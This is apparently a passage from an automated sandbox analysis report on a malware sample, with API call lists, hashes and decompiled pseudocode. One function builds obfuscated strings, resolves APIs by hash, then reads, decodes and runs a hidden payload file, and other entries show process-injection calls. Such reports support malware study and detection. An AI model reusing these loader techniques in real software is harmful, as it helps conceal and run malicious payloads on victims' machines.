                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 702B6467
                                                                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 702B648A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ContextCreateProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2843130473-0
                                                                                            • Opcode ID: 54c8dcba7a9f6ad6e9364bca43b1a7c36f38f2c6337aee8907fa396d8917f535
                                                                                            • Instruction ID: 3609fbe44122f95f75ff789f065e1d4b410a086e495b5ad5bca37fe569639261
                                                                                            • Opcode Fuzzy Hash: 54c8dcba7a9f6ad6e9364bca43b1a7c36f38f2c6337aee8907fa396d8917f535
                                                                                            • Instruction Fuzzy Hash: 5AA12772E00109EFCB51DFA4C985BAEBBB9AF08384F1040A5E515EB254E738AE61DF14
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B1000, Relevance: 3.8, APIs: 3, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 62%
                                                                                            			E702B1000(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				intOrPtr* _t14;
				intOrPtr* _t19;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					 *0x702b3004 =  *_adjust_fdiv;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x702b300c;
						if(_t5 == 0) {
							goto L15;
						}
						_t19 =  *0x702b3008 - 4;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x702b300c;
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x702b300c =  *0x702b300c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80); // executed
					 *0x702b300c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_push(0x702b5004);
						_push(0x702b5000);
						 *0x702b3008 =  *0x702b300c;
						L702B2488();
						 *0x702b3000 =  *0x702b3000 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				if( *0x702b3000 <= _t3) {
					goto L5;
				}
				 *0x702b3000 =  *0x702b3000 - 1;
				goto L3;
			}









                                                                                            0x702b1000
                                                                                            0x702b1006
                                                                                            0x702b1016
                                                                                            0x702b1021
                                                                                            0x702b1027
                                                                                            0x702b106a
                                                                                            0x702b10a5
                                                                                            0x702b10a7
                                                                                            0x00000000
                                                                                            0x702b10a7
                                                                                            0x702b106c
                                                                                            0x702b1073
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b107c
                                                                                            0x702b107f
                                                                                            0x702b1083
                                                                                            0x702b1087
                                                                                            0x702b1089
                                                                                            0x702b108b
                                                                                            0x702b108b
                                                                                            0x702b1090
                                                                                            0x702b1090
                                                                                            0x702b1096
                                                                                            0x702b109c
                                                                                            0x00000000
                                                                                            0x702b10a4
                                                                                            0x702b102e
                                                                                            0x702b1037
                                                                                            0x702b103c
                                                                                            0x702b1042
                                                                                            0x702b104a
                                                                                            0x702b104f
                                                                                            0x702b1054
                                                                                            0x702b1059
                                                                                            0x702b105e
                                                                                            0x00000000
                                                                                            0x702b1065
                                                                                            0x702b103e
                                                                                            0x00000000
                                                                                            0x702b103e
                                                                                            0x702b100e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b1010
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: _inittermfreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1678931842-0
                                                                                            • Opcode ID: d5d29d9cf1b189a5381bd5c7230e5aebd143f8d9b6e8a51897dd8fb1efd44ce9
                                                                                            • Instruction ID: 9b915d26ec0a4871164e3167d92574d47222b93ec2cdcc51c442138db8f06919
                                                                                            • Opcode Fuzzy Hash: d5d29d9cf1b189a5381bd5c7230e5aebd143f8d9b6e8a51897dd8fb1efd44ce9
                                                                                            • Instruction Fuzzy Hash: 63114F337182458BE314BF26DC58B193BB6BF04385B704E1AE9028A650FB399890AB10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B5170, Relevance: 1.7, APIs: 1, Instructions: 155fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E702B5170() {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v1160;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				void* _t129;
				signed int _t130;
				intOrPtr _t131;
				void* _t133;

				_t82 = 0x53;
				_v44 = _t82;
				_t83 = 0x68;
				_v42 = _t83;
				_t84 = 0x6c;
				_v40 = _t84;
				_t85 = 0x77;
				_v38 = _t85;
				_t86 = 0x61;
				_v36 = _t86;
				_t87 = 0x70;
				_v34 = _t87;
				_t88 = 0x69;
				_v32 = _t88;
				_t89 = 0x2e;
				_v30 = _t89;
				_t90 = 0x64;
				_v28 = _t90;
				_t91 = 0x6c;
				_v26 = _t91;
				_t92 = 0x6c;
				_v24 = _t92;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E702B5837();
				_v84 = E702B58E6(_v8, 0x7fc01dae);
				_v116 = E702B58E6(_v8, 0xff7f721a);
				_v80 = E702B58E6(_v8, 0x7fd6a366);
				_v88 = E702B58E6(_v80( &_v44), 0x7f5a653a);
				_v112 = E702B58E6(_v8, 0x7f91a078);
				_v92 = E702B58E6(_v8, 0x7fe63623);
				_v96 = E702B58E6(_v8, 0x7fbd727f);
				_v100 = E702B58E6(_v8, 0x7fb47add);
				_v104 = E702B58E6(_v8, 0x7fe7f840);
				_t147 = _v8;
				_v108 = E702B58E6(_v8, 0x7fe1f1fb);
				_t107 = 0x76;
				_v76 = _t107;
				_t108 = 0x6a;
				_v74 = _t108;
				_t109 = 0x66;
				_v72 = _t109;
				_t110 = 0x63;
				_v70 = _t110;
				_t111 = 0x63;
				_v68 = _t111;
				_t112 = 0x37;
				_v66 = _t112;
				_t113 = 0x74;
				_v64 = _t113;
				_t114 = 0x38;
				_v62 = _t114;
				_t115 = 0x30;
				_v60 = _t115;
				_t116 = 0x75;
				_v58 = _t116;
				_t117 = 0x6f;
				_v56 = _t117;
				_t118 = 0x6c;
				_v54 = _t118;
				_t119 = 0x72;
				_v52 = _t119;
				_t120 = 0x76;
				_v50 = _t120;
				_t121 = 0x37;
				_v48 = _t121;
				_v46 = 0;
				_v84(0x103,  &_v1160);
				_v88( &_v1160,  &_v76);
				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t129;
				if(_v20 != 0xffffffff) {
					_t130 = _v96(_v20, 0);
					_v12 = _t130;
					if(_v12 != 0xffffffff) {
						_t131 = _v100(0, _v12, 0x3000, 4);
						_v16 = _t131;
						if(_v16 != 0) {
							_t133 = _v104(_v20, _v16, _v12,  &_v120, 0);
							if(_t133 != 0) {
								_v108(_v20);
								_v16 = E702B5B78(_t147, _v16, _v12);
								E702B5FFB(_v16);
								return _v112(0);
							}
							return _t133;
						}
						return _t131;
					}
					return _t130;
				}
				return _t129;
			}













































































                                                                                            0x702b5958
                                                                                            0x702b5959
                                                                                            0x702b595f
                                                                                            0x702b5960
                                                                                            0x702b5966
                                                                                            0x702b5967
                                                                                            0x702b596d
                                                                                            0x702b596e
                                                                                            0x702b5974
                                                                                            0x702b5975
                                                                                            0x702b597b
                                                                                            0x702b597c
                                                                                            0x702b5982
                                                                                            0x702b5983
                                                                                            0x702b5989
                                                                                            0x702b598a
                                                                                            0x702b5990
                                                                                            0x702b5991
                                                                                            0x702b5997
                                                                                            0x702b5998
                                                                                            0x702b599e
                                                                                            0x702b599f
                                                                                            0x702b59a5
                                                                                            0x702b59a9
                                                                                            0x702b59b2
                                                                                            0x702b59c2
                                                                                            0x702b59d2
                                                                                            0x702b59e2
                                                                                            0x702b59f8
                                                                                            0x702b5a08
                                                                                            0x702b5a18
                                                                                            0x702b5a28
                                                                                            0x702b5a38
                                                                                            0x702b5a48
                                                                                            0x702b5a50
                                                                                            0x702b5a58
                                                                                            0x702b5a5d
                                                                                            0x702b5a5e
                                                                                            0x702b5a64
                                                                                            0x702b5a65
                                                                                            0x702b5a6b
                                                                                            0x702b5a6c
                                                                                            0x702b5a72
                                                                                            0x702b5a73
                                                                                            0x702b5a79
                                                                                            0x702b5a7a
                                                                                            0x702b5a80
                                                                                            0x702b5a81
                                                                                            0x702b5a87
                                                                                            0x702b5a88
                                                                                            0x702b5a8e
                                                                                            0x702b5a8f
                                                                                            0x702b5a95
                                                                                            0x702b5a96
                                                                                            0x702b5a9c
                                                                                            0x702b5a9d
                                                                                            0x702b5aa3
                                                                                            0x702b5aa4
                                                                                            0x702b5aaa
                                                                                            0x702b5aab
                                                                                            0x702b5ab1
                                                                                            0x702b5ab2
                                                                                            0x702b5ab8
                                                                                            0x702b5ab9
                                                                                            0x702b5abf
                                                                                            0x702b5ac0
                                                                                            0x702b5ac6
                                                                                            0x702b5ad6
                                                                                            0x702b5ae4
                                                                                            0x702b5b00
                                                                                            0x702b5b03
                                                                                            0x702b5b0a
                                                                                            0x702b5b13
                                                                                            0x702b5b16
                                                                                            0x702b5b1d
                                                                                            0x702b5b2d
                                                                                            0x702b5b30
                                                                                            0x702b5b37
                                                                                            0x702b5b4a
                                                                                            0x702b5b4f
                                                                                            0x702b5b56
                                                                                            0x702b5b64
                                                                                            0x702b5b6a
                                                                                            0x00000000
                                                                                            0x702b5b71
                                                                                            0x00000000
                                                                                            0x702b5b4f
                                                                                            0x00000000
                                                                                            0x702b5b37
                                                                                            0x00000000
                                                                                            0x702b5b1d
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 702B5B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 9579adac5176962ad38fb9ade580372e15efcb78908550b07bbd84653c39c1af
                                                                                            • Instruction ID: 813fa4a5c416aa755098f2933b4ce69ceed2e1a0cb45ce432095cac48f864001
                                                                                            • Opcode Fuzzy Hash: 9579adac5176962ad38fb9ade580372e15efcb78908550b07bbd84653c39c1af
                                                                                            • Instruction Fuzzy Hash: A4516D35E50348EEDB60DBE4E952BADB3B5AF48710F20541AE508EF2A0E7741E81DB45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 702B1CC0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 702B1D81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreate
                                                                                            • String ID: Finished Navigation$Moniker %p$hlink %p, flags %#x, user_bind_ctx %p, bind_callback %p, browse_ctx %p.$open$LOu
                                                                                            • API String ID: 170202629-706759311
                                                                                            • Opcode ID: 9d475e00cec46ca1866694bfeb59084564d5044d9439382ad500ac9add2214d9
                                                                                            • Instruction ID: 66248723ec36a2ccf9675d18f2a3909c6a69453537e5fce1fda9d49ea75022f2
                                                                                            • Opcode Fuzzy Hash: 9d475e00cec46ca1866694bfeb59084564d5044d9439382ad500ac9add2214d9
                                                                                            • Instruction Fuzzy Hash: 92813CB6E00209EFDB04DF94D891FAE7775AB48345F108558F905AB380F778EA60CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B16D0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 702B177B
                                                                                            • MkParseDisplayName.OLE32(00000000,00000000,?,00000003), ref: 702B17A4
                                                                                            • wcschr.MSVCRT ref: 702B17C5
                                                                                            Strings
                                                                                            • couldn't create moniker for %s, failed with error 0x%08x, xrefs: 702B1820
                                                                                            • (%p)->(%i %s %s), xrefs: 702B1707
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreateDisplayNameParsewcschr
                                                                                            • String ID: (%p)->(%i %s %s)$couldn't create moniker for %s, failed with error 0x%08x
                                                                                            • API String ID: 207029327-3509610628
                                                                                            • Opcode ID: 1ecfb0e9526f1b360518ffaec2c723a641aa79b85c579136fbfb6a47fd8f2d66
                                                                                            • Instruction ID: 579a08a493f6a6978a36daed7d88ad341f9f8eb37c0fef5d4b68bc193599c96d
                                                                                            • Opcode Fuzzy Hash: 1ecfb0e9526f1b360518ffaec2c723a641aa79b85c579136fbfb6a47fd8f2d66
                                                                                            • Instruction Fuzzy Hash: 5C517FB6A00209EFDB05DF94D885FAE73BABB44345F508958F9169B340F738EA60CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B1930, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 702B19DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreate
                                                                                            • String ID: (%p) -> (%i %p %p)$(Target: %s Location: %s)$<NULL>$<NULL>
                                                                                            • API String ID: 170202629-2214727062
                                                                                            • Opcode ID: b927442f98cce940f60789448d28618e477a20664da2ac52d7d1dc762eac814f
                                                                                            • Instruction ID: 19b9c8729d381a5d45fa06779f8b92e2774eb3d6c80c225b687525b91a0954a7
                                                                                            • Opcode Fuzzy Hash: b927442f98cce940f60789448d28618e477a20664da2ac52d7d1dc762eac814f
                                                                                            • Instruction Fuzzy Hash: 37412BB6A00209EFDB01DF94D895FAE73B9AB44344F504518E91697390F37DEA60CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B1590, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (%p)->(%i %p %s)
                                                                                            • API String ID: 0-2922217910
                                                                                            • Opcode ID: 7e94d91cbea6370c5d1a5d5b3ca0706b3099913e6182bc7b8485e5ce5fc26653
                                                                                            • Instruction ID: f1e336164aaffe95178a625488e4ffac8d2ddb38a80fa46ec43b353cd37436ac
                                                                                            • Opcode Fuzzy Hash: 7e94d91cbea6370c5d1a5d5b3ca0706b3099913e6182bc7b8485e5ce5fc26653
                                                                                            • Instruction Fuzzy Hash: B9414CB6A00108EFCB05DF94D895F9E73BAAB44344F608558E9069B341F739EE61CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B1280, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 21%
                                                                                            			E702B1280(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t50;
				void* _t54;

				_t28 = E702B1150(_a4);
				_v8 = _t28;
				0x702b0000(_a8, _a12);
				_t29 = _v8;
				0x702b0000("(%p)->(%s,%p)\n", _t29, _t28);
				 *_a12 = 0;
				_push(0x10);
				_push(0x702b4124);
				_push(_a8);
				L702B247C();
				_t54 = _t50 + 0x24;
				_v12 = _t29;
				if(_v12 == 0) {
					L2:
					 *_a12 = _v8;
					L7:
					if( *_a12 == 0) {
						return 0x80004002;
					}
					0x702b0000( *_a12);
					return 0;
				}
				_push(0x10);
				_push(0x702b4154);
				_t33 = _a8;
				_push(_t33);
				L702B247C();
				_t54 = _t54 + 0xc;
				_v16 = _t33;
				if(_v16 != 0) {
					_push(0x10);
					_push(0x702b4134);
					_t34 = _a8;
					_push(_t34);
					L702B247C();
					_t54 = _t54 + 0xc;
					_v20 = _t34;
					if(_v20 != 0) {
						_push(0x10);
						_push(0x702b4144);
						_t35 = _a8;
						_push(_t35);
						L702B247C();
						_t54 = _t54 + 0xc;
						_v24 = _t35;
						if(_v24 == 0) {
							 *_a12 = _v8 + 0xc;
						}
					} else {
						 *_a12 = _v8 + 8;
					}
					goto L7;
				}
				goto L2;
			}















                                                                                            0x702b128a
                                                                                            0x702b1292
                                                                                            0x702b129d
                                                                                            0x702b12a6
                                                                                            0x702b12af
                                                                                            0x702b12ba
                                                                                            0x702b12c0
                                                                                            0x702b12c2
                                                                                            0x702b12ca
                                                                                            0x702b12cb
                                                                                            0x702b12d0
                                                                                            0x702b12d3
                                                                                            0x702b12da
                                                                                            0x702b12f8
                                                                                            0x702b12fe
                                                                                            0x702b1352
                                                                                            0x702b1358
                                                                                            0x00000000
                                                                                            0x702b136c
                                                                                            0x702b1360
                                                                                            0x00000000
                                                                                            0x702b1368
                                                                                            0x702b12dc
                                                                                            0x702b12de
                                                                                            0x702b12e3
                                                                                            0x702b12e6
                                                                                            0x702b12e7
                                                                                            0x702b12ec
                                                                                            0x702b12ef
                                                                                            0x702b12f6
                                                                                            0x702b1302
                                                                                            0x702b1304
                                                                                            0x702b1309
                                                                                            0x702b130c
                                                                                            0x702b130d
                                                                                            0x702b1312
                                                                                            0x702b1315
                                                                                            0x702b131c
                                                                                            0x702b132b
                                                                                            0x702b132d
                                                                                            0x702b1332
                                                                                            0x702b1335
                                                                                            0x702b1336
                                                                                            0x702b133b
                                                                                            0x702b133e
                                                                                            0x702b1345
                                                                                            0x702b1350
                                                                                            0x702b1350
                                                                                            0x702b131e
                                                                                            0x702b1327
                                                                                            0x702b1327
                                                                                            0x00000000
                                                                                            0x702b131c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: (%p)->(%s,%p)
                                                                                            • API String ID: 1475443563-1560532818
                                                                                            • Opcode ID: 38f5fc1e6e428c58c43357294f5e22a2e6c8c45c7b423e7cbaab4c890fd1f569
                                                                                            • Instruction ID: cb21ed093d391da515838b33177c253b651c741eec68294aaa1558bc8db5db8f
                                                                                            • Opcode Fuzzy Hash: 38f5fc1e6e428c58c43357294f5e22a2e6c8c45c7b423e7cbaab4c890fd1f569
                                                                                            • Instruction Fuzzy Hash: 84316DB6E00209EFCB00DFA4CC81B9E73B5BB49344F508968F955AB340F378AA64CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: 5jsdph8p9l_r.exe PID: 1280 Parent PID: 7056 5jsdph8p9l_r.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 00A29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
                                                                                            • Instruction ID: 28958e3a7345ae037eb1f22ac6946906b7cc3b05f9de5d2c3d2373b56091ebe1
                                                                                            • Opcode Fuzzy Hash: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
                                                                                            • Instruction Fuzzy Hash: 1A90027121100453D21161695504707000997D0382F91D422B0414558DD6968962F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
                                                                                            • Instruction ID: 5eec4ef28b877f572f8220654545f629d871ac2782f42b3eb80d7f61d9b05f29
                                                                                            • Opcode Fuzzy Hash: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
                                                                                            • Instruction Fuzzy Hash: 0F9002B121100442D24071695404746000597D0342F51D021B5054554EC6998DE5B6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cd510374d6375ecbf96ae5fb3b08711c25134354f319f0c08cc4b6420c468561
                                                                                            • Instruction ID: c1f64eeb769bb5f89a1c796483e52e2fad2b795360b9b9c4a95ad70acb1fa467
                                                                                            • Opcode Fuzzy Hash: cd510374d6375ecbf96ae5fb3b08711c25134354f319f0c08cc4b6420c468561
                                                                                            • Instruction Fuzzy Hash: B89002A121200043420571695414616400A97E0342F51D031F1004590DC56588A1B165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
                                                                                            • Instruction ID: 08e4cd19546d3bd447dd4526378442c1ff09dcb030cbca0bc961e9afb5ebac13
                                                                                            • Opcode Fuzzy Hash: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
                                                                                            • Instruction Fuzzy Hash: D190027121108842D2106169940474A000597D0342F55D421B4414658DC6D588A1B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
                                                                                            • Instruction ID: d35f09fd723b5e0fc727402335f86f0ccb027a0828c8e239d579429ca5bb85cb
                                                                                            • Opcode Fuzzy Hash: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
                                                                                            • Instruction Fuzzy Hash: AF90027121100842D2807169540464A000597D1342F91D025B0015654DCA558A69B7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
                                                                                            • Instruction ID: e53eeb4bad8babaa9b63d5785c5fc4a05f4eef394cd11a09c56404b36accd684
                                                                                            • Opcode Fuzzy Hash: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
                                                                                            • Instruction Fuzzy Hash: 2B90027132114442D21061699404706000597D1342F51D421B0814558DC6D588A1B162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
